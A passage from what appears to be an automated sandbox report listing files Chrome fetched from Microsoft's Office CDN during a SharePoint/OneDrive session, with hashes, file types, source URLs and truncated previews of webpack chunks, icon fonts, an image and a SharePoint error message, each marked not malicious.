                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[79526],{779526:(e,t,n)=>{n.d(t,{Lyn:()=>r,X4M:()=>s,bfQ:()=>i,cLi:()=>o});var a=n(639691);const i=(0,a.U)("Open20Regular","20",["M6 4a2 2 0 0 0-2 2v8c0 1.1.9 2 2 2h8a2 2 0 0 0 2-2v-2.5a.5.5 0 0 1 1 0V14a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h2.5a.5.5 0 0 1 0 1H6Zm5-.5c0-.28.22-.5.5-.5h5c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0V4.7l-4.15 4.15a.5.5 0 0 1-.7-.7L15.29 4H11.5a.5.5 0 0 1-.5-.5Z"]),r=(0,a.U)("PanelLeftHeaderAdd20Filled","20",["M2 6a3 3 0 0 1 3-3h10a3 3 0 0 1 3 3v4.26a5.5 5.5 0 0 0-1-.66V8H8.5v7h.52c.03.34.1.68.19 1H5a3 3 0 0 1-3-3V6Zm15 0a2 2 0 0 0-2-2H8.5v3H17V6Zm2 8.5a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Zm-4-2a.5.5 0 0 0-1 0V14h-1.5a.5.5 0 0 0 0 1H14v1.5a.5.5 0 0 0 1 0V15h1.5a.5.5 0 0 0 0-1H15v-1.5Z"],{flipInRtl:!0}),o=(0,a.U)("PanelLeftHeaderAdd20Regular","20",["M5 3a3 3 0 0 0-3 3v7a3 3 0 0 0 3 3h4.2c-.08-.32-.15-.66-.18-1H8.5V8H17v1.6c.36.18.7.4 1 .66V6a3 3 0 0 0-3-3H5Zm12 4H8.5V
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (8135)
                                                          Category:downloaded
                                                          Size (bytes):8140
                                                          Entropy (8bit):4.3133702721809986
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9EA52A07D7145D2990C05008A975E999
                                                          SHA1:DF7213EDB723E4F43A3152E51D72633CA11268AD
                                                          SHA-256:72EC801DAE1F54AC423FE5B88A4705C2E34F41179A1CAF8EDA08AB92C25038BD
                                                          SHA-512:AFB068986BC9178B1C0CED76B10A7D9207585C48B633D84820BDFA0740ECE2EC619C2EC9DD1FBEDA8BC0C957ACB01144010850A62591C13526C06410EA2B6EEB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/56643.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[56643],{56643:(e,t,n)=>{n.d(t,{Ad:()=>g,NJG:()=>u,PMO:()=>h,SpV:()=>f,TyQ:()=>_,UuR:()=>l,WE_:()=>o,_46:()=>m,icH:()=>s,jAy:()=>d,nOo:()=>r,n_W:()=>i,pfo:()=>b,yUQ:()=>p,zUt:()=>c});var a=n(639691);const i=(0,a.U)("ShareScreenStart24Regular","24",["M2 6.25C2 5.01 3 4 4.25 4h15.5C20.99 4 22 5 22 6.25v11.5c0 1.24-1 2.25-2.25 2.25H4.25C3.01 20 2 19 2 17.75V6.25Zm2.25-.75a.75.75 0 0 0-.75.75v11.5c0 .41.34.75.75.75h15.5c.41 0 .75-.34.75-.75V6.25a.75.75 0 0 0-.75-.75H4.25ZM12 7.25c.2 0 .39.07.53.22l3.25 3.25a.75.75 0 1 1-1.06 1.06l-1.97-1.97v6.44a.75.75 0 0 1-1.5 0V9.81l-1.97 1.97a.75.75 0 1 1-1.06-1.06l3.25-3.25a.75.75 0 0 1 .53-.22Z"]),r=(0,a.U)("ShareScreenStop24Regular","24",["M2 6.25C2 5.01 3 4 4.25 4h15.5C20.99 4 22 5 22 6.25v11.5c0 1.24-1 2.25-2.25 2.25H4.25C3.01 20 2 19 2 17.75V6.25Zm2.25-.75a.75.75 0 0 0-.75.75v11.5c0 .41.34.75.75.75h15.5c.41 0 .75-.34.75-.75V6.25a.75.75 0 0 0-.75-.75H4.2
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 17344, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):17344
                                                          Entropy (8bit):7.980079760537076
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FCE8442EF250EB3F61CAB5822C02C9CF
                                                          SHA1:BF5C297C1E0A8A05DAEDE1039833519B8F930F93
                                                          SHA-256:FF7BC10AC17B93C189E93CFB6A63DA9868850FDCB0A8CE39B3348E68B21C765D
                                                          SHA-512:5525044B4D0A1A586DFAD745859F99838FBF5C3B03094FD269915AF100BA46F894103974BC1F0B2F050115DEE63F9F18CB5CEB08594198EDC411544D40B2216C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-7-29f3d857.woff
                                                          Preview:wOFF......C.................................OS/2.......G...`0.i.cmap...P...........gasp................glyf......;...t.D...head..>|...5...6#.hhea..>........$....hmtx..>....T........loca..?$.........+.Rmaxp..?........ .w.4name..@........O..R.post..C........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.......`u,......7..>.x...KH.P...;f..X4.%.4ER(..(|TcM..........rS.VIP.+q.&..E.ED.A..R.H.......-.B$..(..\.{...g....VN..|w..>..91.....%..T.U.....V.jU....z].e].U]S...tS-jS.n.:.^=.c..F4.1..4.Y.i^_.M..._Z._.n;l......Y..,.r-..X..Z....v....X.jb1....t.^w+.{..._..\....k.D.K....5]I\....U.b...;..3..d..t.(K|.=.x.o..W..9C,..=.3..v.h.....H..<..{Ts.(w.p.S...b.q.B..'..*.".R28.^.SB2..Mrp...........H.j...?c1.,...............x....|..8>...J.-{.:l].a.|;.,./.J.$.s.v....;.9 .B6......J.QJ.p....6....m......+-.........%m.sh%.H8.K,......w..g..p....e..<.P...W.j.M........ec......... ../..X..<..}AX...mL..Z.#m0T.f..j....F....j1..R...B........gd,f.M...,.O...._....EK.........
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (17032)
                                                          Category:downloaded
                                                          Size (bytes):80042
                                                          Entropy (8bit):5.400144309109852
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C9628761598CEAF699733E28E84F5F73
                                                          SHA1:AF9B9BE92B07A6866B82440FBF25E44C53976622
                                                          SHA-256:DACC331AB09BE8F3BB58DDDF6EEC4B6A194EB06B871894130617C7D7CD8400BE
                                                          SHA-512:2C77370DC71F84114E5655C5F42F053754C255FD5231E995AB7FB41385D2F547D2403FEAF8DB3F2C28E8FA4F6CA1B79EB43FA857A31B6EF4381B41E288120B31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/37.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[37,1159],{3414:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.publish=0]="publish",e[e.schedule=1]="schedule",e[e.unpublish=2]="unpublish"}(a||(a={}))}.,6156:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n(19),r=n(66),o=n(74),s=n(279),c=n(4964),d=(0,i.b)(function(){return function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){return e((0,r.b)(s.b,o.a)(c.b)),e((0,r.b)(s.a,o.a)(c.b)),[2]})})}})}.,6160:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n(46),r=n(19),o=n(340),s=n(222);function c(e,t){var n=t.currentItemKey,a=e.demandItemFacet(s.a,n);return a?{currentItemKey:a.remoteItemKey}:{}}var d=(0,r.b)(function(){return function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){return e((0,i.b)(s.a,o.a)(c)),[2]})})}})}.,4964:function(e,t,n){n.d(t,{a:function(){return D},b:fu
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (16494)
                                                          Category:downloaded
                                                          Size (bytes):22637
                                                          Entropy (8bit):5.413016028034625
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:33266759EBA529515DB7A4058D971A83
                                                          SHA1:5A8A46D7CAE8ED324D7E449FB1DD1483E51125B4
                                                          SHA-256:76EDE54CC0DE808BD161E4107F4AF89DB785446CB67F63BD33DD6C1EC0AA1CB1
                                                          SHA-512:1349CB5EC7F6B68EA44F100BAE48DB72F135304BEA2D7195DCBF41117A2F13375B092CAECBB95FEE04D0842772AF361036AB7FC3DBA56241FD218AF2BE4A9082
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/113.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[113],{926:(e,t,n)=>{n.r(t),n.d(t,{ContentBar:()=>Me});var a=n("tslib_538"),i=n(1),r=n(0),o=n(2149),s=n(1938),c=n(164),d=n(161),l=n("fui.util_175");(0,l.ZW)([{rawString:".contentBar_05e96448{grid-area:contentBar;min-height:32px;padding:8px 16px;overflow-x:hidden;overflow-y:hidden;position:relative}"}]);var u=n("odsp.util_517"),f=n(597),p=n(29),m=n(458),_=n(2154),h=n(2151),b=n(2152),g=n(2153),v=n(172),y=n(494),S=n(41),D=n(12),I=n(16),x=n(163),C=n(30),O=n(2679);(0,l.ZW)([{rawString:".viewPills_dafd94e3{display:flex}.viewPillButtonText_dafd94e3{height:20px;line-height:20px}.viewPillButton_dafd94e3{padding:5px 14px;height:32px;border-radius:9999px;background-color:transparent;border:1px solid var(--colorNeutralStroke1);font-size:14px;font-family:'Segoe UI','Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;display:flex;align-items:center;color:var(--colorN
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):34268
                                                          Entropy (8bit):7.950792855146962
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1666AAC9E890DBFA52233EE9DBAC7016
                                                          SHA1:8CBF47E86BCF022D8675A0346EB429F12D9C8285
                                                          SHA-256:BFE9F48B1C1C0A4D93329F3399F4DE41AE5CA780CE4E5FCA7BE168CAFEE394E1
                                                          SHA-512:85B940782FD5607168AB3F41503708FFCA3CDCE1AB953D9F4692B4B15172D296E96598888F6A9F2E79E2C3052A68268C71B02036C05AED0FD6F3C9DAE01E5440
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_meeting_v3.webp
                                                          Preview:RIFF...WEBPVP8X..............ALPH._.....m.H....z.....~4.I.'6Y..W .nf...6.@.`..m.mK.T."*......LI.f..s.....=....(...*...o..Z{...;w..).....m.:In.....ipY..[hvb9f;..2.........ar$sHr.....PS...P.3..=....._.........._.....u..(.......M..6..%....\......3..%......`a]d..f...B...|...4Y..l..EZ....W.....f..W.E-4..].!..nZ.#kM.]Z.i.]Z.4.Y.F..dw...&.iM..5.vi.e....vm...VZ$.2.Lw...e.Y.i-.uY.fM.uY.LL...z0.M.&..f-#..,.e..5]..%..flfl.P.HZ44.7..3omh4.1..<l..mLFCk.o4Og...h.c..5.$.`3Nf.G.D.w ...`1]......z0zj.h.,.#..k]..tY7.J !/.....m...DPeQ.#....HI3cg{p.....m....].....s.......h>2.. ....}.'.......ab.."&@ED...Qi...............m,.'..t..............).....TP.(..n...z=.n.....o.yc..,....v..0..%=..D..lAPQA..Q.!.(f.,F.....2\Z...4.A..i...<..hZ..6Z...e..v?..m....2...P..A......d.4.\.b......k.t..#.di.=.M#.X7.2..H...U.lK......FDQ.A<"m.."..A..2..a-kbYnG.....F.6..Z.0a..Z&.#.e.!Iv..;....... ...@@...A.C...H.K5.%k..M.....9N..B[m.I.....]F...'.6.[.b..4Vg#.......2A'HB.N.4LD.|... . ..C
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4621)
                                                          Category:downloaded
                                                          Size (bytes):9900
                                                          Entropy (8bit):5.1928876886036575
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:87E157376C90524CE1BCA7E6D27AA6BF
                                                          SHA1:FFA088DA52D99E1D4991A20AB2A11BC8ED8F087B
                                                          SHA-256:4A4B1B8D60F62CA066E17B4214C746DBA418DC52CC0B9039FF93ABE29D137B90
                                                          SHA-512:85822887DDE18D76232AD4ED174AAF28EB114F0DADBF8F98CC67F754A50A8F6A68E830D1B2C5239EE22124BFFAA2CC3A5906CFF0544A3090CBD48D9C45B9DC6F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/123.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[123],{5312:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n("react-lib"),r=n(49),o=n(138),s=n(2506),c=n(378),d=function(e){var t=e.gapSpace,n=void 0===t?0:t,d=e.directionalHint,l=void 0===d?o.a.bottomLeftEdge:d,u=e.directionalHintFixed,f=e.targetElement,p=e.firstFocus,m=e.trapFocus,_=e.onLeave,h=e.className,b=e.finalHeight,g=e.content,v=e.calloutProps,y=(0,a.q5)((0,a.q5)((0,a.q5)({},(0,r.h)(e,r.f)),{className:h,target:f,isBeakVisible:!1,directionalHint:l,directionalHintFixed:u,finalHeight:b,minPagePadding:24,onDismiss:_,gapSpace:n}),v);return i.createElement(i.Fragment,null,m?i.createElement(s.a,(0,a.q5)({},y,{focusTrapProps:{forceFocusInsideTrap:!1,isClickableOutsideFocusTrap:!0,disableFirstFocus:!p}}),g):i.createElement(c.a,(0,a.q5)({},y),g))}}.,4575:function(e,t,n){n.d(t,{a:function(){return h}});var a=n(39),i=n(48),r=n("fui.core_932"),o={root:"ms-ExpandingCard-root",compactCard:"ms
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4205)
                                                          Category:downloaded
                                                          Size (bytes):5982
                                                          Entropy (8bit):5.117437598123535
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E88C6E203FA12CF3F38713AAA9AD9AE9
                                                          SHA1:9E5A415FF69439826722FC9DAF1267F88F9C892E
                                                          SHA-256:C6EA34B287F0CD1804F69B4987FAED0FDD29DEE4AA07C3282E0E549247B98492
                                                          SHA-512:98E39CEB1B9422E3C304F0DDE6E3B65899D01788BCA93B242FD8C93C0AB79D215C843138A44CDB80BB05C99BA8103FE0ABDFAA6D19BA23A167C6BD4DA7E74FD9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/132.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[132],{779:(e,t,n)=>{n.r(t),n.d(t,{getAllFilters:()=>f,getAllSmartFilters:()=>u,getEffectiveFilterParams:()=>_,getFilter:()=>c,removeFilter:()=>l,removeSmartFilters:()=>m,updateFilter:()=>d});var a=n(121),i=n(1194),r=n(345),o=n(100),s=n(46);function c(e,t){var n=h(e,t);if(n){var a=i.b(n);if(a&&1===a.length&&a[0]){var r=a[0];return r.id=t,r}}}function d(e,t){if(!t.id)throw new Error("Must provide a filter with an id to use updateFilter");var n=r.a(t);if(!n)throw new Error("Filter could not be serialized");var i=h(e,t.id);if(i){var s=void 0;try{s=o.l(n).documentElement}catch(e){throw new Error("Generated filter was not valid XML!")}i.parentNode.replaceChild(s,i),e.setIsDirty(!0,a.a.filters)}else e.addFilters([n])}function l(e,t){var n=h(e,t);if(n){var i=n.parentNode;"Where"===i.tagName?e.clearFilters():(i.removeChild(n),"Or"!==i.tagName&&"And"!==i.tagName||i.parentNode.replaceChild(i.firstElementChild,i),e.setIs
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5612)
                                                          Category:downloaded
                                                          Size (bytes):8498
                                                          Entropy (8bit):5.362739425263998
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:59E01F90BD9D95D46CA338D10151993F
                                                          SHA1:6F52C1DB8C78BA0307A2EAB552E1516DC326FFCE
                                                          SHA-256:74E03C52320DB46897ABE1825CB99167050CAE88D624E36FF8D8C018DF206CDE
                                                          SHA-512:140D51ABBF4AA1999478F83815E45F207FCCE360349EBEE1158537F47B7A3416092E9AE3EE189EDFD1AB5151D0372597F1D8FD0514FB53B9C64523865067C623
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/126.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[126,130],{782:(e,t,n)=>{n.r(t),n.d(t,{default:()=>r,getQueryType:()=>i});var a=n(1027);function i(e){var t=e[a.b.queryTypeParamKey];return t||(t=e[a.b.parentQueryTypeParamKey]),t?Number(t):0}const r=i}.,1027:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>d,c:()=>s.a});var a=n(47),i=n(198),r=n(641),o=n(642),s=n(419),c={idParamKey:a.b,parentIdParamKey:o.a,driveIdParamKey:"driveId",driveEndpointParamKey:"endpoint",queryTypeParamKey:"view",pageParamKey:"p",parentQueryTypeParamKey:"parentview",windowNameJsonKey:"ODBParams",queryParamKey:a.h,conversationIdParamKey:"cvid",metadataSearchIdKey:a.f,uniqueParamKey:"u",navParamKey:"nav",localeKey:"locale",dateFilterKey:"dateFilter",typeFiltersKey:a.j,userFiltersKey:"userFilters",viewIdKey:a.k,viewPathKey:a.l,isPowerAppView:"isPowerAppView",listIdKey:a.d,listUrlKey:a.e,sortFieldKey:a.i,isAscendingKey:a.c,policyTipKey:"policyTipForListItemId",sharingKey:"sharingDialogForListItemId",openSh
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):293062
                                                          Entropy (8bit):5.8118631452822305
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:97CB7F6F2F57B9A9D7034FAF065646E1
                                                          SHA1:32E50A736CFD47AD934D832AC776D9C69C356EE6
                                                          SHA-256:529FB0C56FD0074B83170672DF805D34CE7F31BF991031FB15FD9A7ABDCAA871
                                                          SHA-512:7E9E7037D36DF9AE70BBEB84F1CBA7D336E8BBB4EABF989BCC8D1FD0E88652A9B2F9553456DAFB43FA2BB955461515A2271DD3D825A9CBD622029918B3FD560A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack.json
                                                          Preview:{"version":"1.0","ramps":[],"loggingData":{},"rampInfo":{},"resources":{"strings":{},"css":[],"imageStrips":[],"inlineScripts":[],"config":{},"cultures":["en-us","en-gb","ja","es","fr","de","af","am-et","ar","as-in","az-latn-az","bg","bs-latn-ba","ca-es-valencia","ca","cs","cy-gb","da","el","es-mx","et","eu","fa","fi","fil-ph","fr-ca","ga-ie","gd","gl","gu","he","hi","hr","hu","hy","id","is","it","ka","kk","km-kh","kn","ko","kok","lb-lu","lo","lt","lv","mi-nz","mk","ml","mr","ms","mt-mt","nb-no","ne-np","nl","nn-no","or-in","pa","pl","pt-br","pt-pt","quz-pe","ro","ru","sk","sl","sq","sr-cyrl-ba","sr-cyrl-rs","sr-latn-rs","sv","ta","te","th","tr","tt","ug","uk","ur","uz-latn-uz","vi","zh-cn","zh-tw","qps-ploca","qps-ploc","qps-plocm"],"scripts":[{"name":"plt.listviewdataprefetch","louserzed":false,"hash":"","hashNoCompress":"","sourceMap":"","zipSize":0,"path":"odblightspeedwebpack/","isWebpack":true},{"name":"initial.resx","louserzed":true,"hash":"","hashNoCompress":"","sourceMap":"","
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 15504, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):15504
                                                          Entropy (8bit):7.972402117738599
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9CA7D978289807BAED4A0E2D5DFE9E52
                                                          SHA1:68531E057084AEE10B375AC09A591CFBB006AF1F
                                                          SHA-256:DFCF7EC4962268B8D3F26C1A2A32536200D6E8D477DBAAC57C20B6F5D15406C8
                                                          SHA-512:FE3E62E975BB11AF7942263163202ABF59153472C5C1F55118D15CAC87DAA66395385A8DAF68AE871ECE8EAC3B92526F178D3B65D3511258CAD6DE4E4E42DE91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-1-d1bde837.woff
                                                          Preview:wOFF......<.......z,........................OS/2.......G...`+.uBcmap...P.......:o.:.gasp...4............glyf...@..5...k@.5..head..7H...6...6#...hhea..7........$....hmtx..7....Y.... t..loca..7..........W..maxp..8........ .|..name..8........O..R.post..<|....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px...1...!...X <....G....x...-K.a...s;..........M."...f...f.t...`p.e8.lS..DD0[...Y...{./....9\......Kd.os3.......6oC6@.Q..g..S.2....g.-..a."{.s...T.R..-MZ.ql.#...`L{#....l...`...Ko\..hX_z.:.P[...u.'=.A...u5u.5]...Uu.E.}NR.........O.I.t................x..}.|[.......-K.fK.,Y..U^dY.-;.....NL ..)...@^ lIXJ....$.....tZw%.7S..m`.0.v:..WfJ...{..OO.e...~......{..,..{O.G.#DwL.Gx".B.^..5{u....By!.5a..qa...x.p.@....l..KC\..S.F......F.9..[.......q..v..0r..7.....k.F..w.....8r.|..}`|.....&.9.k.u..?..=p..5.'....S..J|Q....^...?}..UF..k....5X.z....s.<.f.{.g.._;..qD=W.$...Q2.2.....n...7.n..A.u>/.c3J......."..9.....t......u7=..+.|........}.+...|..(..B%.<dQ.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48918)
                                                          Category:dropped
                                                          Size (bytes):51647
                                                          Entropy (8bit):5.333369374471929
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AC256987C3DC36E69C134E7B82A63C61
                                                          SHA1:EFF6AC3C303FA78BA576B6D4994C2D19F5EDBF85
                                                          SHA-256:E50D138CA94D619C6183DA299EF34EF516F63BF677D7531EE2B0F67352308D30
                                                          SHA-512:4544F01FB1368A601B49B4FED40420F94B15A4DB3CD68DC7E50EC27AE912F59DBC46DD94CB57DD0D4B8CC7B65D5F14DD471E54EE3CD8E3CFDAF1E696D1F9FF3C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[142],{6424:function(e){self,e.exports=function(){"use strict";var e,t,n,a={682:function(e,t,n){n.d(t,{Jh:function(){return r},XA:function(){return o},mG:function(){return i},pi:function(){return a}});var a=function(){return a=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i in t=arguments[n])Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i]);return e},a.apply(this,arguments)};function i(e,t,n,a){return new(n||(n=Promise))(function(i,r){function o(e){try{c(a.next(e))}catch(e){r(e)}}function s(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?i(e.value):(t=e.value,t instanceof n?t:new n(function(e){e(t)})).then(o,s)}c((a=a.apply(e,t||[])).next())})}function r(e,t){var n,a,i,r,o={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return r={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(r[Symbol.iterator]=function(){return this}),r;function s(
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4761)
                                                          Category:downloaded
                                                          Size (bytes):10059
                                                          Entropy (8bit):5.415197890192557
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:11321498B0F8C55B787AF7DE78A465EC
                                                          SHA1:243979684509DB486A3593BA6FACF796397DDB51
                                                          SHA-256:4B626A8F084436C7C7887464912C07062EF505E16EAD13C2D8C83BEC8EC5D246
                                                          SHA-512:6E370C3F9B6A73D65D905AB240E22ED2E70D4DB682C4DE12A438526AA4424BDB87C944E0B6DFF1FCB038E1DF5ACC14C06A0E3EDF78B06C09F4B7882F3CF2E682
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/27281.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[27281],{964379:(e,t,n)=>{n.d(t,{$b4:()=>l,SrP:()=>s,kwE:()=>i,rEx:()=>c,raZ:()=>d,xwF:()=>r,zqK:()=>o});var a=n(639691);const i=(0,a.U)("ImageAdd24Regular","24",["M18.75 4C20.55 4 22 5.46 22 7.25v11.5c0 1.8-1.46 3.25-3.25 3.25H7.25A3.25 3.25 0 0 1 4 18.75V12.5c.47.2.98.34 1.5.42v5.83c0 .2.04.4.1.6l5.83-5.7a2.25 2.25 0 0 1 3.02-.12l.12.11 5.83 5.7c.06-.18.1-.38.1-.59V7.25c0-.97-.78-1.75-1.75-1.75h-5.83A6.46 6.46 0 0 0 12.5 4h6.25Zm-6.2 10.64-.07.07-5.81 5.7c.18.06.38.09.58.09h11.5c.2 0 .4-.03.58-.1l-5.8-5.69a.75.75 0 0 0-.97-.07Zm3.7-7.14a2.25 2.25 0 1 1 0 4.5 2.25 2.25 0 0 1 0-4.5ZM6.5 1a5.5 5.5 0 1 1 0 11 5.5 5.5 0 0 1 0-11Zm9.75 8a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM6.5 3h-.09a.5.5 0 0 0-.4.4L6 3.5V6H3.4a.5.5 0 0 0-.4.41v.18c.04.2.2.36.4.4l.1.01H6v2.6c.05.2.2.36.41.4h.18a.5.5 0 0 0 .4-.4L7 9.5V7h2.6a.5.5 0 0 0 .4-.41v-.18a.5.5 0 0 0-.4-.4L9.5 6H7V3.4a.5.5 0 0 0-.41-.4H6.5Z"]),r=(0,a.U)("
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (42541)
                                                          Category:downloaded
                                                          Size (bytes):42572
                                                          Entropy (8bit):5.254081499823667
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CC71166989A554D5342D9285402EEBAC
                                                          SHA1:0C55CE8682270A29ECEF551E085BC2F6A5EE20A9
                                                          SHA-256:4C494EAB4D585D34BAB159E00B2A8EA056078848F472100FBFDE9EA0695A6EE1
                                                          SHA-512:10F357FA2C8F7BB704B32E6C2033B4E1464FE84E171956C74A53E66F9BF87A1C2B53BFAD55EE25394B8707C5CBFBE6E3367926205F98F02BC1E69A42D62DD6FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.utilities/odsp.util-90e28871.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.util"],{"odsp.util_517":function(e,t,n){function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.d(t,{vw:function(){return bt},bf:function(){return gt},BR:function(){return Ge},qt:function(){return Ge},wI:function(){return Vt},op:function(){return Ye},mz:function(){return Ze},ru:function(){return Xe},XK:function(){return vt},wh:function(){return je},CA:function(){return Y},qq:function(){return _},Nr:function(){return Q},kj:function(){return m},hz:function(){return xt},p4:function(){return q},j9:function(){return p},oq:function(){return r},mj:function(){return Gt},cX:function(){return Mt},Ov:function(){return T},x9:function(){return T},wV:function(){return nt},v4:function(){return cn},KC:function(){return yt},ze:function(){return St},vs:function(){return It},QL:function(){ret
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:XML 1.0 document, ASCII text, with very long lines (443), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):443
                                                          Entropy (8bit):4.920679566192411
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E0A40795A3DCFC0FF6E3060AE42B4139
                                                          SHA1:103AA9D566CE73524F15E89C792BFE2E59EB6512
                                                          SHA-256:84DFB688C8655E3A75E462F66F5A316E29F5DE5AE8D785822F8E4F9BFB6B79F5
                                                          SHA-512:C8A8BC4317E8BEA6513F0C33AD94D97E2D60BE9DAB1EA2FDE301B1007E7D866C39D9FACAC4EC2A3CFFF7CF7FC4F3E49C52B39BCE42E673F7F94D853B051667CE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<?xml version="1.0" encoding="utf-8"?><m:error xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"><m:code>-1, Microsoft.SharePoint.Client.ClientServiceException</m:code><m:message xml:lang="en-US">The HTTP method 'GET' cannot be used to access the resource 'RenderListDataAsStream'. The operation type of the resource is specified as 'Default'. Please use correct HTTP method to invoke the resource.</m:message></m:error>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):16200
